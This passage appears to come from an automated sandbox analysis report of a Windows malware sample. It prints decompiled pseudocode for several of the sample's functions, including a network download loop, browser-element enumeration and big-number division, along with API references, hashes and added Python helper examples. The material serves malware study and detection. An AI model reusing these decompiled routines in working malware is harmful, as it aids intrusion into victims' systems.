                                      							 *_a24 = _t55 - _v16 + _t54;
                                      						}
                                      					}
                                      				}
                                      				return _v12;
                                      			}

                                      APIs
                                      • lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 00FA501D
                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00FA5049
                                      • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00FA505D
                                      • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00FA506C
                                      • memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00FA5087
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: memcpy$AllocateHeaplstrlen
                                      • String ID:
                                      • API String ID: 1819133394-0
                                      • Opcode ID: fa630b15b62685ae1df8d3b3bfaec33385c5dd7c7d377f1dc1140c603b05c542
                                      • Instruction ID: 77fd3b1fe089fc2ee0cf5c0296724342bc25fead0db05976e51c0046b4c04182
                                      • Opcode Fuzzy Hash: fa630b15b62685ae1df8d3b3bfaec33385c5dd7c7d377f1dc1140c603b05c542
                                      • Instruction Fuzzy Hash: 4E21AEB690060AAFCF019FA8CC88A9EBFB9EF86710F058055FD04A7215C735A915DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00FA4CF4(intOrPtr _a4) {
                                      				void* _t2;
                                      				long _t4;
                                      				void* _t5;
                                      				long _t6;
                                      				void* _t7;
                                      
                                      				_t2 = CreateEventA(0, 1, 0, 0);
                                      				 *0xfad224 = _t2;
                                      				if(_t2 == 0) {
                                      					return GetLastError();
                                      				}
                                      				_t4 = GetVersion();
                                      				if(_t4 <= 5) {
                                      					_t5 = 0x32;
                                      					return _t5;
                                      				}
                                      				 *0xfad214 = _t4;
                                      				_t6 = GetCurrentProcessId();
                                      				 *0xfad210 = _t6;
                                      				 *0xfad21c = _a4;
                                      				_t7 = OpenProcess(0x10047a, 0, _t6);
                                      				 *0xfad20c = _t7;
                                      				if(_t7 == 0) {
                                      					 *0xfad20c =  *0xfad20c | 0xffffffff;
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00FA2501,?,?,00000001), ref: 00FA4CFC
                                      • GetVersion.KERNEL32(?,00000001), ref: 00FA4D0B
                                      • GetCurrentProcessId.KERNEL32(?,00000001), ref: 00FA4D1A
                                      • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00FA4D37
                                      • GetLastError.KERNEL32(?,00000001), ref: 00FA4D56
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                      • String ID:
                                      • API String ID: 2270775618-0
                                      • Opcode ID: ca25c51c60ad49b30fe3dc869c666dff5a66b2cd1d3127b4e06e2dd39bd1604e
                                      • Instruction ID: baf469236c3194c53ad04de6f8dfa3c806020deb5c21b9a140362a46a6ddbcf9
                                      • Opcode Fuzzy Hash: ca25c51c60ad49b30fe3dc869c666dff5a66b2cd1d3127b4e06e2dd39bd1604e
                                      • Instruction Fuzzy Hash: FBF017F1A84309DAD7109F65AD09B153BE8AB87B50F10C519F62BC65E0DBB09401FF69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 46%
                                      			E00FA736F(intOrPtr* __eax) {
                                      				void* _v8;
                                      				WCHAR* _v12;
                                      				void* _v16;
                                      				char _v20;
                                      				void* _v24;
                                      				intOrPtr _v28;
                                      				void* _v32;
                                      				intOrPtr _v40;
                                      				short _v48;
                                      				intOrPtr _v56;
                                      				short _v64;
                                      				intOrPtr* _t54;
                                      				intOrPtr* _t56;
                                      				intOrPtr _t57;
                                      				intOrPtr* _t58;
                                      				intOrPtr* _t60;
                                      				void* _t61;
                                      				intOrPtr* _t63;
                                      				intOrPtr* _t65;
                                      				intOrPtr* _t67;
                                      				intOrPtr* _t69;
                                      				intOrPtr* _t71;
                                      				intOrPtr* _t74;
                                      				intOrPtr* _t76;
                                      				intOrPtr _t78;
                                      				intOrPtr* _t82;
                                      				intOrPtr* _t86;
                                      				intOrPtr _t102;
                                      				intOrPtr _t108;
                                      				void* _t117;
                                      				void* _t121;
                                      				void* _t122;
                                      				intOrPtr _t129;
                                      
                                      				_t122 = _t121 - 0x3c;
                                      				_push( &_v8);
                                      				_push(__eax);
                                      				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                      				if(_t117 >= 0) {
                                      					_t54 = _v8;
                                      					_t102 =  *0xfad230; // 0x2a9a5a8
                                      					_t5 = _t102 + 0xfae038; // 0x3050f485
                                      					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                      					_t56 = _v8;
                                      					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                      					if(_t117 >= 0) {
                                      						__imp__#2(0xfac2c8);
                                      						_v28 = _t57;
                                      						if(_t57 == 0) {
                                      							_t117 = 0x8007000e;
                                      						} else {
                                      							_t60 = _v32;
                                      							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                      							_t86 = __imp__#6;
                                      							_t117 = _t61;
                                      							if(_t117 >= 0) {
                                      								_t63 = _v24;
                                      								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                      								if(_t117 >= 0) {
                                      									_t129 = _v20;
                                      									if(_t129 != 0) {
                                      										_v64 = 3;
                                      										_v48 = 3;
                                      										_v56 = 0;
                                      										_v40 = 0;
                                      										if(_t129 > 0) {
                                      											while(1) {
                                      												_t67 = _v24;
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												_t122 = _t122;
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                      												if(_t117 < 0) {
                                      													goto L16;
                                      												}
                                      												_t69 = _v8;
                                      												_t108 =  *0xfad230; // 0x2a9a5a8
                                      												_t28 = _t108 + 0xfae0bc; // 0x3050f1ff
                                      												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                      												if(_t117 >= 0) {
                                      													_t74 = _v16;
                                      													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                      													if(_t117 >= 0 && _v12 != 0) {
                                      														_t78 =  *0xfad230; // 0x2a9a5a8
                                      														_t33 = _t78 + 0xfae078; // 0x76006f
                                      														if(lstrcmpW(_v12, _t33) == 0) {
                                      															_t82 = _v16;
                                      															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                      														}
                                      														 *_t86(_v12);
                                      													}
                                      													_t76 = _v16;
                                      													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                      												}
                                      												_t71 = _v8;
                                      												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                      												_v40 = _v40 + 1;
                                      												if(_v40 < _v20) {
                                      													continue;
                                      												}
                                      												goto L16;
                                      											}
                                      										}
                                      									}
                                      								}
                                      								L16:
                                      								_t65 = _v24;
                                      								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                      							}
                                      							 *_t86(_v28);
                                      						}
                                      						_t58 = _v32;
                                      						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                      					}
                                      				}
                                      				return _t117;
                                      			}

                                      APIs
                                      • SysAllocString.OLEAUT32(00FAC2C8), ref: 00FA73BF
                                      • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00FA74A1
                                      • SysFreeString.OLEAUT32(00000000), ref: 00FA74BA
                                      • SysFreeString.OLEAUT32(?), ref: 00FA74E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: String$Free$Alloclstrcmp
                                      • String ID:
                                      • API String ID: 1885612795-0
                                      • Opcode ID: 82108c8f929349cbeb32a616fbb466b14a06fae4aa53fd0f2598e34c9f63f4b1
                                      • Instruction ID: 3991245469617805a0aaa2df7044d9f4e7620ddcbd704fe52aa0b5e63162616b
                                      • Opcode Fuzzy Hash: 82108c8f929349cbeb32a616fbb466b14a06fae4aa53fd0f2598e34c9f63f4b1
                                      • Instruction Fuzzy Hash: 575130B5D00619DFCB00EFA8C888DAEBBB9FF8A704B148595E915EB210D7759D01DFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00FA674C(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				void _v92;
                                      				void _v236;
                                      				void* _t55;
                                      				unsigned int _t56;
                                      				signed int _t66;
                                      				signed int _t74;
                                      				void* _t76;
                                      				signed int _t79;
                                      				void* _t81;
                                      				void* _t92;
                                      				void* _t96;
                                      				signed int* _t99;
                                      				signed int _t101;
                                      				signed int _t103;
                                      				void* _t107;
                                      
                                      				_t92 = _a12;
                                      				_t101 = __eax;
                                      				_t55 = E00FA40A2(_a16, _t92);
                                      				_t79 = _t55;
                                      				if(_t79 == 0) {
                                      					L18:
                                      					return _t55;
                                      				}
                                      				_t56 =  *(_t92 + _t79 * 4 - 4); // top 32-bit element of the _t79-element array at _a12; the loop at the end counts its significant bits, bounded by 0x20
                                      				_t81 = 0;
                                      				_t96 = 0x20;
                                      				if(_t56 == 0) {
                                      					L4:
                                      					_t97 = _t96 - _t81;
                                      					_v12 = _t96 - _t81;
                                      					E00FAA2E7(_t79,  &_v236);
                                      					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00FA7010(_t101,  &_v236, _a8, _t96 - _t81);
                                      					E00FA7010(_t79,  &_v92, _a12, _t97);
                                      					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                      					_t66 = E00FAA2E7(_t101,  &E00FAD168);
                                      					_t103 = _t101 - _t79;
                                      					_a8 = _t103;
                                      					if(_t103 < 0) {
                                      						L17:
                                      						E00FAA2E7(_a16, _a4);
                                      						E00FA6F99(_t79,  &_v236, _a4, _t97);
                                      						memset( &_v236, 0, 0x8c); // wipe both stack work buffers (0x8c and 0x44 bytes) before returning
                                      						_t55 = memset( &_v92, 0, 0x44);
                                      						goto L18;
                                      					}
                                      					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                      					do {
                                      						if(_v8 != 0xffffffff) {
                                      							_push(1);
                                      							_push(0);
                                      							_push(0);
                                      							_push( *_t99);
                                      							L00FAAEF0();
                                      							_t74 = _t66 +  *(_t99 - 4);
                                      							asm("adc edx, esi");
                                      							_push(0);
                                      							_push(_v8 + 1);
                                      							_push(_t92);
                                      							_push(_t74);
                                      							L00FAAEEA();
                                      							if(_t92 > 0 || _t74 > 0xffffffff) { // high dword of the 64-bit _aulldiv quotient is nonzero: the estimate does not fit in 32 bits, saturate it at 0xffffffff
                                      								_t74 = _t74 | 0xffffffff;
                                      								_v16 = _v16 & 0x00000000;
                                      							}
                                      						} else {
                                      							_t74 =  *_t99;
                                      						}
                                      						_t106 = _t107 + _a8 * 4 - 0xe8;
                                      						_a12 = _t74;
                                      						_t76 = E00FA3EEB(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                      						while(1) {
                                      							 *_t99 =  *_t99 - _t76;
                                      							if( *_t99 != 0) {
                                      								goto L14;
                                      							}
                                      							L13:
                                      							_t92 =  &_v92;
                                      							if(E00FA4A9C(_t79, _t92, _t106) < 0) {
                                      								break;
                                      							}
                                      							L14:
                                      							_a12 = _a12 + 1;
                                      							_t76 = E00FA949F(_t79,  &_v92, _t106, _t106);
                                      							 *_t99 =  *_t99 - _t76;
                                      							if( *_t99 != 0) {
                                      								goto L14;
                                      							}
                                      							goto L13;
                                      						}
                                      						_a8 = _a8 - 1;
                                      						_t66 = _a12;
                                      						_t99 = _t99 - 4;
                                      						 *(_a8 * 4 +  &E00FAD168) = _t66;
                                      					} while (_a8 >= 0);
                                      					_t97 = _v12;
                                      					goto L17;
                                      				}
                                      				while(_t81 < _t96) {
                                      					_t81 = _t81 + 1;
                                      					_t56 = _t56 >> 1;
                                      					if(_t56 != 0) {
                                      						continue;
                                      					}
                                      					goto L4;
                                      				}
                                      				goto L4;
                                      			}

                                      Instruction addresses for the pseudocode above, one per line in the report's side-by-side view and flattened by extraction: 0x00fa674f through 0x00fa68cb (0x00000000 where the decompiler mapped no instruction).

                                      APIs
                                      • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00FA67F9
                                      • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00FA680F
                                      • memset.NTDLL ref: 00FA68AF
                                      • memset.NTDLL ref: 00FA68BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: memset$_allmul_aulldiv
                                      • String ID:
                                      • API String ID: 3041852380-0
                                      • Opcode ID: 8a09113f8ec5bb5f5d3261742c8d6a4dc4fdce3fc5ac1f8d911288a6e56fc3a9
                                      • Instruction ID: 4f4721970c381db180aaeb75d4384c27690745ecfc75b15de6d9c1aab7b0e1c7
                                      • Opcode Fuzzy Hash: 8a09113f8ec5bb5f5d3261742c8d6a4dc4fdce3fc5ac1f8d911288a6e56fc3a9
                                      • Instruction Fuzzy Hash: 1841D5B1A00209ABDB10DFA8CC41FEE7778EF46720F148529F915E7181DB74AD58EB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%
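The pseudocode of E00FA674C reads as schoolbook multi-limb division: the bounded `>> 1` loop counts the significant bits of the divisor's top limb, E00FA7010 is applied to both operands with that shift count, and each iteration forms a 64-bit value with _allmul, divides it with _aulldiv and saturates the result at 0xffffffff before subtracting. The Python below is an added reference implementation of that algorithm (Knuth's Algorithm D on 32-bit limbs), written for this page and not code from the sample or the report. The sample's helpers E00FA3EEB, E00FA949F and E00FA4A9C are not modelled because the decompilation does not resolve what they do; the model is the general algorithm, self-checked against Python's integers, so an analyst can compare its control flow with the function instead of guessing at the arithmetic.

```python
# Added reference implementation, not code from the sample: schoolbook
# long division on 32-bit limbs (Knuth, TAOCP vol. 2, Algorithm D), the
# algorithm whose skeleton E00FA674C shows. The sample's helper routines
# (E00FA3EEB, E00FA949F, E00FA4A9C) are not modelled; their exact roles are
# unresolved in the decompilation.

import random
from typing import List, Tuple

LIMB_BITS = 32
LIMB_MASK = (1 << LIMB_BITS) - 1


def to_limbs(n: int, width: int = 0) -> List[int]:
    """Little-endian 32-bit limbs of n >= 0, zero-padded to at least `width`."""
    limbs = []
    while n:
        limbs.append(n & LIMB_MASK)
        n >>= LIMB_BITS
    limbs += [0] * max(0, width - len(limbs))
    return limbs or [0]


def from_limbs(limbs: List[int]) -> int:
    return sum(l << (LIMB_BITS * i) for i, l in enumerate(limbs))


def divmod_limbs(u: List[int], v: List[int]) -> Tuple[List[int], List[int]]:
    """Return (quotient, remainder) limb lists for u / v."""
    u, v = list(u), list(v)
    while len(v) > 1 and v[-1] == 0:
        v.pop()
    while len(u) > 1 and u[-1] == 0:
        u.pop()
    if v == [0]:
        raise ZeroDivisionError("divisor is zero")
    n = len(v)
    if from_limbs(u) < from_limbs(v):
        return [0], u

    # D1: normalise so the divisor's top limb has its high bit set. The
    # sample derives the same count by shifting the top limb right until it
    # is zero, bounded by 0x20.
    s = LIMB_BITS - v[-1].bit_length()
    vn = to_limbs(from_limbs(v) << s, n)
    un = to_limbs(from_limbs(u) << s, len(u) + 1)  # one extra top limb
    m = len(un) - n - 1
    q = [0] * (m + 1)

    for j in range(m, -1, -1):
        # D3: 64-bit numerator from the top two window limbs, 64/32 divide
        # (_allmul + _aulldiv in the sample), saturated at 0xffffffff.
        num = (un[j + n] << LIMB_BITS) | un[j + n - 1]
        qhat = min(num // vn[n - 1], LIMB_MASK)

        # D4: multiply-subtract qhat * vn from the (n+1)-limb window at un[j].
        borrow = 0
        for i in range(n):
            p = qhat * vn[i] + borrow
            t = un[i + j] - (p & LIMB_MASK)
            un[i + j] = t & LIMB_MASK
            borrow = (p >> LIMB_BITS) + (1 if t < 0 else 0)
        t = un[j + n] - borrow
        un[j + n] = t & LIMB_MASK
        negative = t < 0

        # D6: estimate too large (by at most 2 without Knuth's second-limb
        # refinement): decrement qhat and add the divisor back until >= 0.
        while negative:
            qhat -= 1
            carry = 0
            for i in range(n):
                t = un[i + j] + vn[i] + carry
                un[i + j] = t & LIMB_MASK
                carry = t >> LIMB_BITS
            t = un[j + n] + carry
            un[j + n] = t & LIMB_MASK
            negative = (t >> LIMB_BITS) == 0  # no carry out: still negative
        q[j] = qhat

    # D8: the low n limbs hold the normalised remainder; shift it back.
    r = to_limbs(from_limbs(un[:n]) >> s)
    while len(q) > 1 and q[-1] == 0:
        q.pop()
    return q, r


def divmod_ints(a: int, b: int) -> Tuple[int, int]:
    """Limb division on Python ints, for cross-checking against divmod()."""
    q, r = divmod_limbs(to_limbs(a), to_limbs(b))
    return from_limbs(q), from_limbs(r)


def self_check(trials: int = 200, seed: int = 1) -> bool:
    """Compare with Python's divmod on edge cases and seeded random operands."""
    rng = random.Random(seed)
    cases = [(0, 1), (LIMB_MASK, 1 << 31), ((1 << 64) - 1, (1 << 32) + 1),
             (1 << 96, 1 << 32), ((1 << 128) - 1, (1 << 64) - 1)]
    for _ in range(trials):
        a = rng.getrandbits(rng.randrange(1, 256))
        b = rng.getrandbits(rng.randrange(1, 160)) or 1
        cases.append((a, b))
    return all(divmod_ints(a, b) == divmod(a, b) for a, b in cases)


if __name__ == "__main__":
    print("ok" if self_check() else "MISMATCH")
```

Running the file prints `ok` when every case agrees with `divmod`. The one behavioural difference worth noting when comparing against the function: `divmod_limbs` raises on a zero divisor, whereas E00FA674C simply returns when E00FA40A2 yields 0 and never reaches the arithmetic.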

                                      C-Code - Quality: 56%
                                      			E00FA6A74(void* __eax) {
                                      				long _v8;
                                      				char _v12;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				void* _v24;
                                      				void* __esi;
                                      				char* _t40;
                                      				long _t41;
                                      				intOrPtr _t45;
                                      				intOrPtr* _t46;
                                      				char _t48;
                                      				char* _t53;
                                      				long _t54;
                                      				intOrPtr* _t55;
                                      				void* _t64;
                                      
                                      				_t64 = __eax;
                                      				_t40 =  &_v12;
                                      				_v8 = 0;
                                      				_v16 = 0;
                                      				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // unresolved import called on the handle stored at +0x18; the WinINet error codes tested below show it is a WinINet request call, with _v12 receiving a byte count
                                      				if(_t40 == 0) {
                                      					_t41 = GetLastError();
                                      					_v8 = _t41;
                                      					if(_t41 != 0x2efe) { // 0x2efe = ERROR_INTERNET_CONNECTION_ABORTED (12030): an aborted connection is treated as end of data (return 0), not as a failure
                                      						L26:
                                      						return _v8;
                                      					}
                                      					_v8 = 0;
                                      					L25:
                                      					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                                      					goto L26;
                                      				}
                                      				if(_v12 == 0) {
                                      					goto L25;
                                      				}
                                      				_push( &_v24);
                                      				_push(1);
                                      				_push(0);
                                      				if( *0xfad138() != 0) { // indirect call through a pointer at 0xfad138 with arguments (0, 1, &_v24); the argument shape and the vtable use on _v24 below fit CreateStreamOnHGlobal(NULL, TRUE, &pStream), an inference the decompiler does not confirm
                                      					_v8 = 8;
                                      					goto L26;
                                      				}
                                      				_t45 = E00FA550F(0x1000); // 0x1000-byte heap buffer (E00FA550F wraps RtlAllocateHeap, see APIs below)
                                      				_v20 = _t45;
                                      				if(_t45 == 0) {
                                      					_v8 = 8;
                                      					L21:
                                      					_t46 = _v24;
                                      					 *((intOrPtr*)( *_t46 + 8))(_t46); // vtable slot 8 on a COM object: IUnknown::Release of the object in _v24
                                      					goto L26;
                                      				} else {
                                      					goto L4;
                                      				}
                                      				do {
                                      					while(1) {
                                      						L4:
                                      						_t48 = _v12;
                                      						if(_t48 >= 0x1000) {
                                      							_t48 = 0x1000;
                                      						}
                                      						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16); // (handle, buffer, bytes to read, &bytes read): InternetReadFile-shaped call reading at most 0x1000 bytes per pass; import name not resolved by the decompiler
                                      						if(_t48 == 0) {
                                      							break;
                                      						}
                                      						_t55 = _v24;
                                      						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0); // vtable slot 0x10: IStream::Write(buffer, bytes read, NULL) if _v24 is the stream inferred above
                                      						_t17 =  &_v12;
                                      						 *_t17 = _v12 - _v16;
                                      						if( *_t17 != 0) {
                                      							continue;
                                      						}
                                      						L10:
                                      						if(WaitForSingleObject( *0xfad224, 0) != 0x102) { // zero-timeout poll of a global event; anything other than WAIT_TIMEOUT (0x102) means it was signalled and the download is abandoned
                                      							_v8 = 0x102;
                                      							L18:
                                      							E00FAA07B(_v20);
                                      							if(_v8 == 0) {
                                      								_v8 = E00FA9BAA(_v24, _t64);
                                      							}
                                      							goto L21;
                                      						}
                                      						_t53 =  &_v12;
                                      						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
                                      						if(_t53 != 0) {
                                      							goto L15;
                                      						}
                                      						_t54 = GetLastError();
                                      						_v8 = _t54;
                                      						if(_t54 != 0x2f78 || _v12 != 0) { // 0x2f78 = ERROR_HTTP_INVALID_SERVER_RESPONSE (12152): treated as a normal end of the response only when no bytes remain
                                      							goto L18;
                                      						} else {
                                      							_v8 = 0;
                                      							goto L15;
                                      						}
                                      					}
                                      					_v8 = GetLastError();
                                      					goto L10;
                                      					L15:
                                      				} while (_v12 != 0);
                                      				goto L18;
                                      			}

                                      Instruction addresses for the pseudocode above, one per line in the report's side-by-side view and flattened by extraction: 0x00fa6a7c through 0x00fa6bb1 (0x00000000 where the decompiler mapped no instruction).

                                      APIs
                                      • GetLastError.KERNEL32 ref: 00FA6B94
                                        • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
                                      • GetLastError.KERNEL32 ref: 00FA6B08
                                      • WaitForSingleObject.KERNEL32(00000000), ref: 00FA6B18
                                      • GetLastError.KERNEL32 ref: 00FA6B38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                      • String ID:
                                      • API String ID: 35602742-0
                                      • Opcode ID: f4e531a3f6805008a48edf8f7bc32f22cc0768f5a13718326fa9a5130c11fa26
                                      • Instruction ID: 2ba781bd81458a18892528ca870a67a7621c9b7d818642bcaf9d932a902130ca
                                      • Opcode Fuzzy Hash: f4e531a3f6805008a48edf8f7bc32f22cc0768f5a13718326fa9a5130c11fa26
                                      • Instruction Fuzzy Hash: 2641F9F1E00209EFDF10DFA4D9849AEBBB9FF46394B248469E402E3151D7359E40EB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%
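Each function record above carries the same metadata: the C-Code quality, the APIs reached directly or through a subcall (with the call-site address), the Similarity block (API ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes) and the Uniqueness score. The Python below is an added example, not a Joe Sandbox tool and not part of this report: it parses such records from the flattened text into structured objects so they can be indexed or compared across reports. Its input is a constructed excerpt of two records from this page, trimmed to their metadata lines and with the second record truncated, as it is further down the page, so the parser has to tolerate missing fields.

```python
# Added example, not part of the report: a parser for the per-function
# metadata records of a Joe Sandbox-style report (quality, direct and subcall
# API references, Similarity fields, Uniqueness score). SAMPLE_REPORT is a
# constructed excerpt of two records from this page, trimmed to their
# metadata lines; the second is truncated to exercise tolerant parsing.
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE_REPORT = """
C-Code - Quality: 56%
    E00FA6A74(void* __eax) {
    }
APIs
• GetLastError.KERNEL32 ref: 00FA6B94
  • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
• WaitForSingleObject.KERNEL32(00000000), ref: 00FA6B18
Similarity
• API ID: ErrorLast$AllocateHeapObjectSingleWait
• String ID:
• API String ID: 35602742-0
• Opcode ID: f4e531a3f6805008a48edf8f7bc32f22cc0768f5a13718326fa9a5130c11fa26
• Instruction Fuzzy Hash: 2641F9F1E00209EFDF10DFA4D9849AEBBB9FF46394B248469E402E3151D7359E40EB60
Uniqueness Score: -1.00%

C-Code - Quality: 87%
    E00FA50B5(signed int _a4, signed int* _a8) {
    }
APIs
  • Part of subcall function 00FAA090: lstrlen.KERNEL32(?,00000000), ref: 00FAA0C6
• CreateEventA.KERNEL32(00FAD234,00000001,00000000,00000000), ref: 00FA50F4
• WaitForSingleObject.KERNEL32(00000000,00004E20), ref: 00FA5152
• CloseHandle.KERNEL32(00000000), ref: 00FA5198
Similarity
• API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
• API String ID: 73268831-0
• Opcode ID: 3b7e19cdca46c0c3272824f1c6746e4bb8a021d364609fbbb623447281fa6580
"""

HEADER = re.compile(r"C-Code - Quality:\s*(\d+)%")
FUNC = re.compile(r"^\s*(E[0-9A-Fa-f]{8})\(")
API = re.compile(r"•\s*(?:Part of subcall function\s+([0-9A-Fa-f]{8}):\s*)?"
                 r"(\w+)\.(\w+)(?:\([^)]*\))?,?\s*ref:\s*([0-9A-Fa-f]{8})")
SIM = re.compile(r"•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
                 r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*)")
UNIQ = re.compile(r"Uniqueness Score:\s*(-?[\d.]+)%")


@dataclass
class ApiRef:
    name: str
    module: str
    ref: str                   # address of the call site
    via: Optional[str] = None  # subcall function when the call is indirect


@dataclass
class FunctionRecord:
    name: str
    quality: int
    apis: List[ApiRef] = field(default_factory=list)
    similarity: Dict[str, str] = field(default_factory=dict)
    uniqueness: Optional[float] = None


def parse_report(text: str) -> List[FunctionRecord]:
    """Split the text into records at each 'C-Code - Quality' header."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        m = HEADER.search(line)
        if m:
            current = FunctionRecord(name="", quality=int(m.group(1)))
            records.append(current)
            continue
        if current is None:
            continue
        if not current.name:  # still looking for the signature line
            m = FUNC.match(line)
            if m:
                current.name = m.group(1).upper()
            continue
        m = API.search(line)
        if m:
            via, name, module, ref = m.groups()
            current.apis.append(ApiRef(name, module, ref.upper(), via))
            continue
        m = SIM.search(line)
        if m:
            current.similarity[m.group(1)] = m.group(2).strip()
            continue
        m = UNIQ.search(line)
        if m:
            current.uniqueness = float(m.group(1))
    return records


def direct_apis(rec: FunctionRecord) -> List[str]:
    """APIs called from the function body itself, not through a subcall."""
    return [a.name for a in rec.apis if a.via is None]


def functions_calling(records: List[FunctionRecord], api: str) -> List[str]:
    """Functions that reach `api` directly or via a listed subcall."""
    return sorted({r.name for r in records for a in r.apis if a.name == api})


def index_by(records: List[FunctionRecord], key: str) -> Dict[str, str]:
    """Map a Similarity field value (e.g. an Opcode ID) to the function name."""
    return {r.similarity[key]: r.name for r in records if key in r.similarity}
```

The Opcode ID and Instruction ID are content hashes of the function's bytes and disassembly, so `index_by(records, "Opcode ID")` built from several reports gives an exact-match lookup across samples; the fuzzy-hash fields are meant for approximate comparison and are kept as opaque strings here because the report does not document their encoding.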

                                      C-Code - Quality: 87%
                                      			E00FA50B5(signed int _a4, signed int* _a8) {
                                      				void* __ecx;
                                      				void* __edi;
                                      				signed int _t6;
                                      				intOrPtr _t8;
